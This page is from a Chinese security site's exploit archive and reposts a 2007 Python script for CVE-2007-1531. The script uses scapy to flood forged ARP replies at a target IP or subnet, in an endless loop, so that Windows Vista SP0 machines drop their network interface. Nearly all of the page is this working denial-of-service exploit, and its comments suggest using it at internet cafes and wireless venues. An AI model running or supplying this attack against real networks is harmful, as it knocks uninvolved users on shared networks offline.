首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 MS Windows Vista forged ARP packet Network Stack DoS Exploit 来源：www.vfocus.net 作者：Kristian 发布时间：2007-05-16   #!/usr/bin/env python # # :: Kristian Hermansen :: # Date: 20070514 # Reference: CVE-2007-1531 # Description: Microsoft Windows Vista (SP0) dumps interfaces when # it receives this ARP packet.  This DoS is useful for an internet # cafe, wireless venue, or legitimate local attack.  The victim will # need to manually refresh their network interface.  OK, sure # it's a dumb local attack, but why does Vista disable iface!?!?? # -> Thanks to Newsham / Hoagland # Vulnerable: Microsoft Windows Vista (SP0) [All Versions] # Tested: # * victim == Windows Vista Enterprise (SP0) [English] # * attacker == Ubuntu Feisty (7.04) # Usage: python fISTArp.py <victim> # Depends: scapy.py # [?] If you don't have scapy # [+] wget http://hg.secdev.org/scapy/raw-file/tip/scapy.py from sys import argv from os import geteuid from scapy import Ether,ARP,send,srp,conf from time import sleep conf.verb = 0 def head():     print """                        __ ___ ____ _____  _                                     / _|_ _/ ___|_   _|/ \   _ __ _ __                       | |_ | |\___ \ | | / _ \ | '__| '_ \                      |  _|| | ___) || |/ ___ \| |  | |_) |                      |_| |___|____/ |_/_/   \_\_|  | .__/                                                    |_|        """ def isroot():     if geteuid() != 0:         print "TRY AGAIN AS ROOT SILLY..."         return False     else:         return True def usage():     print "usage:", argv[0], "<victim(s)>"     print "examples:", argv[0], "192.168.1.100"     print "examples:", argv[0], "192.168.1.0/24\n" def fisting():     arp_fist = ARP(pdst=argv[1],op=2)     print "We are going to loop forever, CTRL-C to stop...\n"     while True:         sleep(3)         for a in arp_fist:             arping = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=a.pdst)             ans,unans = srp(arping,timeout=0.1)             if len(ans) == 1:                 a.psrc=a.pdst                 print a.pdst, "is ALIVE!"                 print "* Time to shut it down!"                 send(a)                 ans2,unans2 = srp(arping,timeout=0.1)                 if len(unans2) == 1:                     print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"                     print "@@@", a.psrc, "was rubber fisted!"                     print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"                     sleep(3)                 else:                     print "FAILED:", a.pdst, "is still alive :-("             else:                 print a.pdst, "is already DEAD!"             print head() if isroot() != True:     exit(1) if len(argv) != 2:     usage()     exit(1) else:     fisting() # u.b.u.n.t.u n.e.t.s.n.i.p.e.r t.h.c.t.e.st.   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Eudora 7.1 SMTP ResponseRemote ·CA BrightStor Backup 11.5.2.0 ·TinyIdentD <= 2.2 Remote Buffe ·SimpNews <= 2.40.01 (print.php ·webdesproxy 0.0.1 (GET Request ·FAQEngine <= 4.16.03 (question ·VImpX ActiveX (VImpX.ocx v. 4. ·MagicISO <= 5.4(build239) .cue ·webdesproxy 0.0.1 (GET Request ·LeadTools JPEG 2000 COM Object ·notepad++ 4.1 ruby file proces ·LeadTools Thumbnail Browser Co   推荐广告

CopyRight © 2002-2025 VFocuS.Net All Rights Reserved